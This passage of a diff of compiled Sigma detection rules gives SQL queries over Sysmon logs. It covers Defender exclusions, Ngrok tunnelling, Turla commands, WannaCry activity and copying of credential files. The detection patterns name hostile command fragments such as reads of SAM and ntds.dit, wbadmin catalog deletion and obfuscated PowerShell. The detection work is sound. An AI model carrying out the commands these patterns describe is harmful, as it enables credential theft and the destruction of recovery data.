Folder Exclusion Added Via Reg.EXE", + "id": "48917adc-a28e-4f5d-b729-11e75da8941f", + "status": "experimental", + "description": "Detects the usage of \"reg.exe\" to add Defender folder exclusions. Qbot has been seen using this technique to add exlcusions for folders within AppData and ProgramData.", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1059.001", - "attack.t1021.006" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Legitimate usage of remote Powershell, e.g. for monitoring purposes." 
+ "Legitimate use" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\wsmprovhost.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wsmprovhost.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\reg.exe' ESCAPE '\\' AND (CommandLine LIKE '%SOFTWARE\\\\Microsoft\\\\Windows Defender\\\\Exclusions\\\\Paths%' ESCAPE '\\' OR CommandLine LIKE '%SOFTWARE\\\\Microsoft\\\\Microsoft Antimalware\\\\Exclusions\\\\Paths%' ESCAPE '\\') AND CommandLine LIKE '%ADD %' ESCAPE '\\' AND CommandLine LIKE '%/t %' ESCAPE '\\' AND CommandLine LIKE '%REG\\_DWORD %' ESCAPE '\\' AND CommandLine LIKE '%/v %' ESCAPE '\\' AND CommandLine LIKE '%/d %' ESCAPE '\\' AND CommandLine LIKE '%0%' ESCAPE '\\')" ], - "filename": "proc_creation_win_winrm_remote_powershell_session_process.yml" + "filename": "proc_creation_win_reg_defender_exclusion.yml" }, { - "title": "PUA - AdvancedRun Execution", - "id": "d2b749ee-4225-417e-b20e-a8d2193cbb84", + "title": "CL_Mutexverifiers.ps1 Proxy Execution", + "id": "1e0e1a81-e79b-44bc-935b-ddb9c8006b3d", "status": "experimental", - "description": "Detects the execution of AdvancedRun utility", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the use of a Microsoft signed script to execute commands", + "author": "oscd.community, Natalia Shornikova, frack113", + "tags": [ + "attack.defense_evasion", + "attack.t1216" + ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'AdvancedRun.exe' OR (CommandLine LIKE '% /EXEFilename %' ESCAPE '\\' AND CommandLine LIKE '% /Run%' ESCAPE '\\') OR (CommandLine LIKE '% /WindowState 0%' ESCAPE '\\' AND CommandLine LIKE '% /RunAs %' ESCAPE '\\' AND CommandLine LIKE '% /CommandLine %' ESCAPE '\\')))" + 
"SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%\\\\CL\\_Mutexverifiers.ps1%' ESCAPE '\\' AND CommandLine LIKE '%runAfterCancelProcess %' ESCAPE '\\')" ], - "filename": "proc_creation_win_pua_advancedrun.yml" + "filename": "proc_creation_win_lolbin_cl_mutexverifiers.yml" }, { - "title": "Ps.exe Renamed SysInternals Tool", - "id": "18da1007-3f26-470f-875d-f77faf1cab31", + "title": "PUA - Ngrok Execution", + "id": "ee37eb7c-a4e7-4cd5-8fa4-efa27f1c3f31", "status": "test", - "description": "Detects renamed SysInternals tool execution with a binary named ps.exe as used by Dragonfly APT group and documented in TA17-293A report", + "description": "Detects the use of Ngrok, a utility used for port forwarding and tunneling, often used by threat actors to make local protected services publicly available.\nInvolved domains are bin.equinox.io for download and *.ngrok.io for connections.\n", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.g0035", - "attack.t1036.003", - "car.2013-05-009" + "attack.command_and_control", + "attack.t1572" ], "falsepositives": [ - "Renamed SysInternals tool" + "Another tool that uses the command line switches of Ngrok", + "Ngrok http 3978 (https://docs.microsoft.com/en-us/azure/bot-service/bot-service-debug-channel-ngrok?view=azure-bot-service-4.0)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine = 'ps.exe -accepteula')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '% tcp 139%' ESCAPE '\\' OR CommandLine LIKE '% tcp 445%' ESCAPE '\\' OR CommandLine LIKE '% tcp 3389%' ESCAPE '\\' OR CommandLine LIKE '% tcp 5985%' ESCAPE '\\' OR CommandLine LIKE '% tcp 5986%' ESCAPE '\\') OR (CommandLine LIKE '% start %' ESCAPE '\\' AND CommandLine LIKE '%--all%' ESCAPE '\\' AND 
CommandLine LIKE '%--config%' ESCAPE '\\' AND CommandLine LIKE '%.yml%' ESCAPE '\\') OR (Image LIKE '%ngrok.exe' ESCAPE '\\' AND (CommandLine LIKE '% tcp %' ESCAPE '\\' OR CommandLine LIKE '% http %' ESCAPE '\\' OR CommandLine LIKE '% authtoken %' ESCAPE '\\')) OR (CommandLine LIKE '%.exe authtoken %' ESCAPE '\\' OR CommandLine LIKE '%.exe start --all%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_apt_ta17_293a_ps.yml" + "filename": "proc_creation_win_pua_ngrok.yml" }, { - "title": "Use of UltraViewer Remote Access Software", - "id": "88656cec-6c3b-487c-82c0-f73ebb805503", - "status": "experimental", - "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. 
(Citation: Symantec Living off the Land)\n", - "author": "frack113", + "title": "Suspicious Control Panel DLL Load", + "id": "d7eb979b-c2b5-4a6f-a3a7-c87ce6763819", + "status": "test", + "description": "Detects suspicious Rundll32 execution from control.exe as used by Equation Group and Exploit Kits", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.defense_evasion", + "attack.t1218.011" ], "falsepositives": [ - "Legitimate use" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Product = 'UltraViewer' OR Company = 'DucFabulous Co,ltd' OR OriginalFileName LIKE 'UltraViewer\\_Desktop.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\System32\\\\control.exe' ESCAPE '\\' AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE')) AND NOT (CommandLine LIKE '%Shell32.dll%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_remote_access_software_ultraviewer.yml" + "filename": "proc_creation_win_rundll32_susp_control_dll_load.yml" }, { - "title": "Dropping Of Password Filter DLL", - "id": "b7966f4a-b333-455b-8370-8ca53c229762", - "status": "test", - "description": "Detects dropping of dll files in system32 that may be used to retrieve user credentials from LSASS", - "author": "Sreeman", + "title": "Delete Important Scheduled Task", + "id": "dbc1f800-0fe0-4bc0-9c66-292c2abe3f78", + "status": "experimental", + "description": "Detects when adversaries stop services or processes by deleting their respective scheduled tasks in order to conduct data destructive activities", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1556.002" + "attack.impact", + "attack.t1489" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - 
"level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\Lsa%' ESCAPE '\\' AND CommandLine LIKE '%scecli\\\\0%' ESCAPE '\\' AND CommandLine LIKE '%reg add%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/delete%' ESCAPE '\\' AND CommandLine LIKE '%/tn%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\Windows\\\\SystemRestore\\\\SR%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Windows Defender\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\BitLocker%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\WindowsBackup\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\WindowsUpdate\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\UpdateOrchestrator\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\ExploitGuard%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_reg_credential_access_via_password_filter.yml" + "filename": "proc_creation_win_schtasks_delete.yml" }, { - "title": "Malicious Base64 Encoded PowerShell Keywords in Command Lines", - "id": "f26c6093-6f14-4b12-800f-0fcb46f5ffd0", + "title": "Turla Group Commands May 2020", + "id": "9e2e51c5-c699-4794-ba5a-29f5da40ac0c", "status": "test", - "description": "Detects base64 encoded strings used in hidden malicious PowerShell command lines", - "author": "John Lambert (rule)", + "description": "Detects commands used by Turla group as reported by ESET in May 2020", + "author": "Florian Roth (Nextron Systems)", "tags": [ + "attack.g0010", "attack.execution", - "attack.t1059.001" + "attack.t1059.001", + "attack.t1053.005", + "attack.t1027" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 
'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND CommandLine LIKE '% hidden %' ESCAPE '\\' AND (CommandLine LIKE '%AGkAdABzAGEAZABtAGkAbgAgAC8AdAByAGEAbgBzAGYAZQByA%' ESCAPE '\\' OR CommandLine LIKE '%aXRzYWRtaW4gL3RyYW5zZmVy%' ESCAPE '\\' OR CommandLine LIKE '%IAaQB0AHMAYQBkAG0AaQBuACAALwB0AHIAYQBuAHMAZgBlAHIA%' ESCAPE '\\' OR CommandLine LIKE '%JpdHNhZG1pbiAvdHJhbnNmZX%' ESCAPE '\\' OR CommandLine LIKE '%YgBpAHQAcwBhAGQAbQBpAG4AIAAvAHQAcgBhAG4AcwBmAGUAcg%' ESCAPE '\\' OR CommandLine LIKE '%Yml0c2FkbWluIC90cmFuc2Zlc%' ESCAPE '\\' OR CommandLine LIKE '%AGMAaAB1AG4AawBfAHMAaQB6AGUA%' ESCAPE '\\' OR CommandLine LIKE '%JABjAGgAdQBuAGsAXwBzAGkAegBlA%' ESCAPE '\\' OR CommandLine LIKE '%JGNodW5rX3Npem%' ESCAPE '\\' OR CommandLine LIKE '%QAYwBoAHUAbgBrAF8AcwBpAHoAZQ%' ESCAPE '\\' OR CommandLine LIKE '%RjaHVua19zaXpl%' ESCAPE '\\' OR CommandLine LIKE '%Y2h1bmtfc2l6Z%' ESCAPE '\\' OR CommandLine LIKE '%AE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4A%' ESCAPE '\\' OR CommandLine LIKE '%kATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8Abg%' ESCAPE '\\' OR CommandLine LIKE '%lPLkNvbXByZXNzaW9u%' ESCAPE '\\' OR CommandLine LIKE '%SQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuA%' ESCAPE '\\' OR CommandLine LIKE '%SU8uQ29tcHJlc3Npb2%' ESCAPE '\\' OR CommandLine LIKE '%Ty5Db21wcmVzc2lvb%' ESCAPE '\\' OR CommandLine LIKE '%AE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQ%' ESCAPE '\\' OR CommandLine LIKE '%kATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtA%' ESCAPE '\\' OR CommandLine LIKE '%lPLk1lbW9yeVN0cmVhb%' ESCAPE '\\' OR CommandLine LIKE '%SQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0A%' ESCAPE '\\' OR CommandLine LIKE '%SU8uTWVtb3J5U3RyZWFt%' ESCAPE '\\' OR CommandLine LIKE '%Ty5NZW1vcnlTdHJlYW%' ESCAPE '\\' OR CommandLine LIKE '%4ARwBlAHQAQwBoAHUAbgBrA%' ESCAPE '\\' OR CommandLine LIKE '%5HZXRDaHVua%' ESCAPE '\\' OR CommandLine LIKE '%AEcAZQB0AEMAaAB1AG4Aaw%' ESCAPE '\\' OR CommandLine LIKE 
'%LgBHAGUAdABDAGgAdQBuAGsA%' ESCAPE '\\' OR CommandLine LIKE '%LkdldENodW5r%' ESCAPE '\\' OR CommandLine LIKE '%R2V0Q2h1bm%' ESCAPE '\\' OR CommandLine LIKE '%AEgAUgBFAEEARABfAEkATgBGAE8ANgA0A%' ESCAPE '\\' OR CommandLine LIKE '%QASABSAEUAQQBEAF8ASQBOAEYATwA2ADQA%' ESCAPE '\\' OR CommandLine LIKE '%RIUkVBRF9JTkZPNj%' ESCAPE '\\' OR CommandLine LIKE '%SFJFQURfSU5GTzY0%' ESCAPE '\\' OR CommandLine LIKE '%VABIAFIARQBBAEQAXwBJAE4ARgBPADYANA%' ESCAPE '\\' OR CommandLine LIKE '%VEhSRUFEX0lORk82N%' ESCAPE '\\' OR CommandLine LIKE '%AHIAZQBhAHQAZQBSAGUAbQBvAHQAZQBUAGgAcgBlAGEAZA%' ESCAPE '\\' OR CommandLine LIKE '%cmVhdGVSZW1vdGVUaHJlYW%' ESCAPE '\\' OR CommandLine LIKE '%MAcgBlAGEAdABlAFIAZQBtAG8AdABlAFQAaAByAGUAYQBkA%' ESCAPE '\\' OR CommandLine LIKE '%NyZWF0ZVJlbW90ZVRocmVhZ%' ESCAPE '\\' OR CommandLine LIKE '%Q3JlYXRlUmVtb3RlVGhyZWFk%' ESCAPE '\\' OR CommandLine LIKE '%QwByAGUAYQB0AGUAUgBlAG0AbwB0AGUAVABoAHIAZQBhAGQA%' ESCAPE '\\' OR CommandLine LIKE '%0AZQBtAG0AbwB2AGUA%' ESCAPE '\\' OR CommandLine LIKE '%1lbW1vdm%' ESCAPE '\\' OR CommandLine LIKE '%AGUAbQBtAG8AdgBlA%' ESCAPE '\\' OR CommandLine LIKE '%bQBlAG0AbQBvAHYAZQ%' ESCAPE '\\' OR CommandLine LIKE '%bWVtbW92Z%' ESCAPE '\\' OR CommandLine LIKE '%ZW1tb3Zl%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%tracert -h 10 yahoo.com%' ESCAPE '\\' OR CommandLine LIKE '%.WSqmCons))|iex;%' ESCAPE '\\' OR CommandLine LIKE '%Fr`omBa`se6`4Str`ing%' ESCAPE '\\') OR (CommandLine LIKE '%net use https://docs.live.net%' ESCAPE '\\' AND CommandLine LIKE '%@aol.co.uk%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_powershell_hidden_b64_cmd.yml" + "filename": "proc_creation_win_apt_turla_comrat_may20.yml" }, { - "title": "WebDav Client Execution", - "id": "2dbd9d3d-9e27-42a8-b8df-f13825c6c3d5", - "status": "test", - "description": "Detects \"svchost.exe\" spawning \"rundll32.exe\" with command arguments like 
C:\\windows\\system32\\davclnt.dll,DavSetCookie.\nThis could be an indicator of exfiltration or use of WebDav to launch code (hosted on WebDav Server).\n", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "title": "Shells Spawned by Java", + "id": "dff1e1cc-d3fd-47c8-bfc2-aeb878a754c0", + "status": "experimental", + "description": "Detects shell spawned from Java host process, which could be a sign of exploitation (e.g. log4j exploitation)", + "author": "Andreas Hunkeler (@Karneades), Nasreddine Bencherchali", "tags": [ - "attack.exfiltration", - "attack.t1048.003" + "attack.initial_access", + "attack.persistence", + "attack.privilege_escalation" ], "falsepositives": [ - "Unknown" + "Legitimate calls to system binaries", + "Company specific internal usage" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND CommandLine LIKE '%C:\\\\windows\\\\system32\\\\davclnt.dll,DavSetCookie%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\java.exe' ESCAPE '\\' AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\')) AND NOT (ParentImage LIKE '%build%' ESCAPE '\\' AND CommandLine LIKE '%build%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_rundll32_webdav_client_execution.yml" + "filename": "proc_creation_win_java_susp_child_process_2.yml" }, { - "title": "Potential Credential Dumping Attempt Using New NetworkProvider - CLI", - "id": "baef1ec6-2ca9-47a3-97cc-4cf2bda10b77", + "title": "Install New Package Via Winget Local Manifest", + "id": "313d6012-51a0-4d93-8dfc-de8553239e25", "status": "experimental", - "description": "Detects when an attacker tries to add a new network provider in order to dump clear text 
credentials, similar to how the NPPSpy tool does it", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects usage of winget to install applications via manifest file. Adversaries can abuse winget to download payloads remotely and execute them.\nThe manifest option enables you to install an application by passing in a YAML file directly to the client.\nWinget can be used to download and install exe, msi or msix files later.\n", + "author": "Sreeman, Florian Roth (Nextron Systems), frack113", "tags": [ - "attack.credential_access", - "attack.t1003" + "attack.defense_evasion", + "attack.execution", + "attack.t1059" ], "falsepositives": [ - "Other legitimate network providers used and not filtred in this rule" + "Some false positives are expected in some environment that may use this functionality to install and test their custom applications" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%\\\\System\\\\CurrentControlSet\\\\Services\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\NetworkProvider%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\winget.exe' ESCAPE '\\' OR OriginalFileName = 'winget.exe') AND (CommandLine LIKE '%install%' ESCAPE '\\' OR CommandLine LIKE '% add %' ESCAPE '\\') AND (CommandLine LIKE '%-m %' ESCAPE '\\' OR CommandLine LIKE '%--manifest%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_registry_new_network_provider.yml" + "filename": "proc_creation_win_winget_local_install_via_manifest.yml" }, { - "title": "Nslookup PowerShell Download Cradle - ProcessCreation", - "id": "1b3b01c7-84e9-4072-86e5-fc285a41ff23", + "title": "Rundll32 UNC Path Execution", + "id": "5cdb711b-5740-4fb2-ba88-f7945027afac", "status": "experimental", - "description": "Detects suspicious powershell download cradle using nslookup. 
This cradle uses nslookup to extract payloads from DNS records", + "description": "Detects rundll32 execution where the DLL is located on a remote location (share)", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.defense_evasion", + "attack.execution", + "attack.t1021.002", + "attack.t1218.011" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\nslookup.exe%' ESCAPE '\\' OR OriginalFileName LIKE '\\\\nslookup.exe' ESCAPE '\\') AND ((ParentImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND (CommandLine LIKE '% -q=txt %' ESCAPE '\\' OR CommandLine LIKE '% -querytype=txt %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE' OR CommandLine LIKE '%rundll32%' ESCAPE '\\') AND CommandLine LIKE '% \\\\\\\\\\*' ESCAPE '\\')" ], - "filename": "proc_creation_win_nslookup_poweshell_download.yml" + "filename": "proc_creation_win_rundll32_unc_path.yml" }, { - "title": "Suspicious File Download Using Office Application", - "id": "0c79148b-118e-472b-bdb7-9b57b444cc19", + "title": "Copying Sensitive Files with Credential Data", + "id": "e7be6119-fc37-43f0-ad4f-1f3f99be2f9f", "status": "test", - "description": "Detects the usage of one of three Microsoft office applications (Word, Excel, PowerPoint) to download arbitrary files", - "author": "Beyu Denis, oscd.community", + "description": "Files with well-known filenames (sensitive files with credential data) copying", + "author": "Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.credential_access", + "attack.t1003.002", + "attack.t1003.003", + 
"car.2013-07-001", + "attack.s0404" ], "falsepositives": [ - "Unknown" + "Copying sensitive files for legitimate use (eg. backup) or forensic investigation by legitimate incident responder or forensic invetigator" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR Image LIKE '%\\\\winword.exe' ESCAPE '\\' OR Image LIKE '%\\\\excel.exe' ESCAPE '\\') AND CommandLine LIKE '%http%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\esentutl.exe' ESCAPE '\\' OR OriginalFileName LIKE '\\\\esentutl.exe' ESCAPE '\\') AND (CommandLine LIKE '%vss%' ESCAPE '\\' OR CommandLine LIKE '% /m %' ESCAPE '\\' OR CommandLine LIKE '% /y %' ESCAPE '\\')) OR (CommandLine LIKE '%\\\\windows\\\\ntds\\\\ntds.dit%' ESCAPE '\\' OR CommandLine LIKE '%\\\\config\\\\sam%' ESCAPE '\\' OR CommandLine LIKE '%\\\\config\\\\security%' ESCAPE '\\' OR CommandLine LIKE '%\\\\config\\\\system %' ESCAPE '\\' OR CommandLine LIKE '%\\\\repair\\\\sam%' ESCAPE '\\' OR CommandLine LIKE '%\\\\repair\\\\system%' ESCAPE '\\' OR CommandLine LIKE '%\\\\repair\\\\security%' ESCAPE '\\' OR CommandLine LIKE '%\\\\config\\\\RegBack\\\\sam%' ESCAPE '\\' OR CommandLine LIKE '%\\\\config\\\\RegBack\\\\system%' ESCAPE '\\' OR CommandLine LIKE '%\\\\config\\\\RegBack\\\\security%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_office.yml" + "filename": "proc_creation_win_esentutl_sensitive_file_copy.yml" }, { - "title": "HackTool - UACMe Akagi Execution", - "id": "d38d2fa4-98e6-4a24-aff1-410b0c9ad177", + "title": "Suspicious CustomShellHost Execution", + "id": "84b14121-9d14-416e-800b-f3b829c5a14d", "status": "experimental", - "description": "Detects the execution of UACMe, a tool used for UAC bypasses, via default PE metadata", - "author": "Christian Burkard (Nextron Systems), Florian Roth (Nextron 
Systems)", + "description": "Detects the execution of CustomShellHost binary where the child isn't located in 'C:\\Windows\\explorer.exe'", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.t1216" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Product = 'UACMe' OR Company IN ('REvol Corp', 'APT 92', 'UG North', 'Hazardous Environments', 'CD Project Rekt') OR Description IN ('UACMe main module', 'Pentesting utility') OR OriginalFileName IN ('Akagi.exe', 'Akagi64.exe') OR (Image LIKE '%\\\\Akagi64.exe' ESCAPE '\\' OR Image LIKE '%\\\\Akagi.exe' ESCAPE '\\') OR (Hashes LIKE '%IMPHASH=767637C23BB42CD5D7397CF58B0BE688%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=14C4E4C72BA075E9069EE67F39188AD8%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3C782813D4AFCE07BBFC5A9772ACDBDC%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=7D010C6BB6A3726F327F7E239166D127%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=89159BA4DD04E4CE5559F132A9964EB3%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=6F33F4A5FC42B8CEC7314947BD13F30F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=5834ED4291BDEB928270428EBBAF7604%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=5A8A8A43F25485E7EE1B201EDCBC7A38%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=DC7D30B90B2D8ABF664FBED2B1B59894%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=41923EA1F824FE63EA5BEB84DB7A3E74%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3DE09703C8E79ED2CA3F01074719906B%' ESCAPE '\\') OR Imphash IN ('767637c23bb42cd5d7397cf58b0be688', '14c4e4c72ba075e9069ee67f39188ad8', '3c782813d4afce07bbfc5a9772acdbdc', '7d010c6bb6a3726f327f7e239166d127', '89159ba4dd04e4ce5559f132a9964eb3', '6f33f4a5fc42b8cec7314947bd13f30f', '5834ed4291bdeb928270428ebbaf7604', '5a8a8a43f25485e7ee1b201edcbc7a38', 'dc7d30b90b2d8abf664fbed2b1b59894', '41923ea1f824fe63ea5beb84db7a3e74', 
'3de09703c8e79ed2ca3f01074719906b')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%\\\\CustomShellHost.exe' ESCAPE '\\' AND NOT (Image LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_uacme.yml" + "filename": "proc_creation_win_lolbin_customshellhost.yml" }, { - "title": "WannaCry Ransomware Activity", - "id": "41d40bff-377a-43e2-8e1b-2e543069e079", - "status": "test", - "description": "Detects WannaCry ransomware activity", - "author": "Florian Roth (Nextron Systems), Tom U. @c_APT_ure (collection), oscd.community, Jonhnathan Ribeiro", + "title": "Renamed PsExec Service Execution", + "id": "51ae86a2-e2e1-4097-ad85-c46cb6851de4", + "status": "experimental", + "description": "Detects suspicious launch of a renamed version of the PSEXESVC service with, which is not often used by legitimate administrators", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.t1210", - "attack.discovery", - "attack.t1083", - "attack.defense_evasion", - "attack.t1222.001", - "attack.impact", - "attack.t1486", - "attack.t1490" + "attack.execution" ], "falsepositives": [ - "Unknown" + "Legitimate administrative tasks" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\tasksche.exe' ESCAPE '\\' OR Image LIKE '%\\\\mssecsvc.exe' ESCAPE '\\' OR Image LIKE '%\\\\taskdl.exe' ESCAPE '\\' OR Image LIKE '%\\\\taskhsvc.exe' ESCAPE '\\' OR Image LIKE '%\\\\taskse.exe' ESCAPE '\\' OR Image LIKE '%\\\\111.exe' ESCAPE '\\' OR Image LIKE '%\\\\lhdfrgui.exe' ESCAPE '\\' OR Image LIKE '%\\\\linuxnew.exe' ESCAPE '\\' OR Image LIKE '%\\\\wannacry.exe' ESCAPE '\\') OR Image LIKE '%WanaDecryptor%' ESCAPE '\\' OR (CommandLine LIKE '%icacls%' ESCAPE '\\' AND CommandLine LIKE '%/grant%' ESCAPE '\\' AND CommandLine LIKE 
'%Everyone:F%' ESCAPE '\\' AND CommandLine LIKE '%/T%' ESCAPE '\\' AND CommandLine LIKE '%/C%' ESCAPE '\\' AND CommandLine LIKE '%/Q%' ESCAPE '\\') OR (CommandLine LIKE '%bcdedit%' ESCAPE '\\' AND CommandLine LIKE '%/set%' ESCAPE '\\' AND CommandLine LIKE '%{default}%' ESCAPE '\\' AND CommandLine LIKE '%recoveryenabled%' ESCAPE '\\' AND CommandLine LIKE '%no%' ESCAPE '\\') OR (CommandLine LIKE '%wbadmin%' ESCAPE '\\' AND CommandLine LIKE '%delete%' ESCAPE '\\' AND CommandLine LIKE '%catalog%' ESCAPE '\\' AND CommandLine LIKE '%-quiet%' ESCAPE '\\') OR CommandLine LIKE '%@Please\\_Read\\_Me@.txt%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND OriginalFileName = 'psexesvc.exe' AND NOT (Image LIKE 'C:\\\\Windows\\\\PSEXESVC.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_malware_wannacry.yml" + "filename": "proc_creation_win_renamed_sysinternals_psexec_service.yml" }, { - "title": "Potential Manage-bde.wsf Abuse To Proxy Execution", - "id": "c363385c-f75d-4753-a108-c1a8e28bdbda", - "status": "test", - "description": "Detects potential abuse of the \"manage-bde.wsf\" script as a LOLBIN to proxy execution", - "author": "oscd.community, Natalia Shornikova, Nasreddine Bencherchali (Nextron Systems)", + "title": "Potential Dridex Activity", + "id": 